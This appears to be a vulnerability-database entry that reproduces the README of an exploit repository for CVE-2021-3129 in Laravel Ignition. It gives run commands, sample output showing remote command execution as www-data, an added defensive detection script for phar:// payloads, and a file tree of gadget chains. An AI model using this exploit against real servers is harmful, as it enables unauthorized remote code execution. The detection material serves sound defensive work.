Related vulnerability
Description
CVE-2021-3129 Laravel Ignition RCE Exploit
Introduction
# CVE-2021-3129 Laravel Ignition RCE Exploit
This is a Python exploit script for CVE-2021-3129, a remote code execution vulnerability in Laravel when the Ignition package is installed. This vulnerability allows an attacker to execute arbitrary system commands via PHAR deserialization.
## Features
- Automatically generates the PHAR payload using `phpggc`
- Accepts user input for any command to execute (e.g., `id`, `whoami`, etc.)
- Automates the entire exploitation process, including clearing logs, injecting the payload, converting logs to PHAR, and triggering the deserialization
## Prerequisites
- Python 3.x
- `requests` library
- PHP installed on your system
- [phpggc](https://github.com/ambionics/phpggc) installed (for generating PHAR payloads)
## Installation
1. Clone the repository:
```bash
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
```
2. Install required Python packages:
```bash
pip install requests
```
3. Run the script with the desired target and command:
```bash
python3 CVE-2021-3129.py http://example.com --cmd 'id'
```
Example output:
```bash
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
```
## Arguments
- `target` (required): The URL of the vulnerable Laravel application.
- `--cmd` (optional): The command to be executed on the target (default: `whoami`).
- `--log_path` (optional): The log file path to be used (default: `../storage/logs/laravel.log`).
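
For defenders, the flow listed under Features (turning the log file into a PHAR and then deserializing it) shows up in request bodies as a PHP stream wrapper where a plain file path is expected, often pointing at the default log path above. The following Python detection sketch is an added example, not part of this repository; the audit-record layout (`src`, `body`), the `file` field name and the sample records are constructed assumptions.

```python
import json
import re

# PHP stream wrappers that should not appear where an application expects a plain file path.
WRAPPER_RE = re.compile(r"^\s*(phar|php|zip|data|expect|glob)://", re.IGNORECASE)
# Default log location from the Arguments section; matched loosely so ../ prefixes still hit.
LOG_RE = re.compile(r"storage/logs/[^/\s]+\.log", re.IGNORECASE)

def iter_strings(node, path=""):
    """Yield (json_path, value) for every string nested in a parsed JSON body."""
    if isinstance(node, dict):
        for key, val in node.items():
            yield from iter_strings(val, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from iter_strings(val, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node

def scan_record(line):
    """Return findings for one JSON-lines audit record: {"src": ..., "body": "<raw request body>"}."""
    rec = json.loads(line)
    try:
        body = json.loads(rec.get("body", ""))
    except (json.JSONDecodeError, TypeError):
        return []  # non-JSON bodies are out of scope for this sketch
    findings = []
    for where, value in iter_strings(body):
        m = WRAPPER_RE.match(value)
        if not m:
            continue
        wrapper = m.group(1).lower()
        # phar:// aimed at the application log matches the "convert logs to PHAR, then deserialize" flow.
        severity = "high" if wrapper == "phar" and LOG_RE.search(value) else "medium"
        findings.append({"src": rec.get("src"), "field": where, "wrapper": wrapper, "severity": severity})
    return findings

# Constructed sample records (not captured traffic); "file" is a hypothetical field name.
SAMPLE = [
    '{"src": "198.51.100.7", "body": "{\\"parameters\\": {\\"file\\": \\"phar://../storage/logs/laravel.log\\"}}"}',
    '{"src": "198.51.100.7", "body": "{\\"parameters\\": {\\"file\\": \\"resources/views/home.blade.php\\"}}"}',
    '{"src": "203.0.113.9", "body": "name=alice&age=30"}',
]

if __name__ == "__main__":
    for line in SAMPLE:
        for finding in scan_record(line):
            print(finding)
```

The scan is field-name agnostic on purpose, so it also flags wrapper URIs in parameters other than the one a given tool happens to use.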
## POC


File snapshot
[4.0K] /data/pocs/a9736c8098a7e0f8a5af044f2e6b6e210c7430e8
├── [4.0K] CVE-2021-3129.py
├── [ 393] Dockerfile
├── [4.0K] gadgetchains
│ └── [4.0K] Monolog
│ ├── [4.0K] FW
│ │ └── [4.0K] 1
│ │ ├── [ 669] chain.php
│ │ └── [1.1K] gadgets.php
│ └── [4.0K] RCE
│ ├── [4.0K] 1
│ │ ├── [ 610] chain.php
│ │ └── [ 786] gadgets.php
│ ├── [4.0K] 2
│ │ ├── [ 593] chain.php
│ │ └── [ 864] gadgets.php
│ ├── [4.0K] 3
│ │ ├── [ 532] chain.php
│ │ └── [ 937] gadgets.php
│ ├── [4.0K] 4
│ │ ├── [ 899] chain.php
│ │ └── [1.8K] gadgets.php
│ ├── [4.0K] 5
│ │ ├── [ 517] chain.php
│ │ └── [ 744] gadgets.php
│ ├── [4.0K] 6
│ │ ├── [ 520] chain.php
│ │ └── [1.1K] gadgets.php
│ ├── [4.0K] 7
│ │ ├── [ 721] chain.php
│ │ └── [ 396] gadgets.php
│ ├── [4.0K] 8
│ │ ├── [ 624] chain.php
│ │ └── [1.1K] gadgets.php
│ └── [4.0K] 9
│ ├── [ 607] chain.php
│ └── [ 787] gadgets.php
├── [4.0K] lib
│ ├── [1.5K] diagnose_payload.php
│ ├── [4.0K] PHPGGC
│ │ ├── [4.0K] Enhancement
│ │ │ ├── [2.2K] ASCIIStrings.php
│ │ │ ├── [ 290] Enhancement.php
│ │ │ ├── [ 541] Enhancements.php
│ │ │ ├── [2.3K] FastDestruct.php
│ │ │ ├── [ 802] PlusNumbers.php
│ │ │ └── [1.4K] Wrapper.php
│ │ ├── [ 69] Exception.php
│ │ ├── [4.0K] GadgetChain
│ │ │ ├── [ 670] FileDelete.php
│ │ │ ├── [ 703] FileInclude.php
│ │ │ ├── [ 727] FileRead.php
│ │ │ ├── [1.4K] FileWrite.php
│ │ │ ├── [ 593] PHPInfo.php
│ │ │ ├── [4.0K] RCE
│ │ │ │ ├── [ 472] Command.php
│ │ │ │ ├── [ 571] FunctionCall.php
│ │ │ │ └── [ 587] PHPCode.php
│ │ │ ├── [1.1K] RCE.php
│ │ │ ├── [ 459] SqlInjection.php
│ │ │ └── [ 458] SSRF.php
│ │ ├── [5.8K] GadgetChain.php
│ │ ├── [ 80] InvalidArgumentsException.php
│ │ ├── [4.0K] Phar
│ │ │ ├── [2.9K] Format.php
│ │ │ ├── [ 325] Phar.php
│ │ │ ├── [4.1K] Tar.php
│ │ │ └── [ 155] Zip.php
│ │ └── [1.7K] Util.php
│ ├── [ 27K] PHPGGC.php
│ └── [1.1K] test_payload.php
├── [ 247] phpggc
├── [4.0K] POC
│ ├── [ 25K] 1.png
│ └── [ 61K] 2.png
├── [1.8K] README.md
└── [4.0K] templates
├── [ 246] chain.php
└── [ 7] gadgets.php
22 directories, 56 files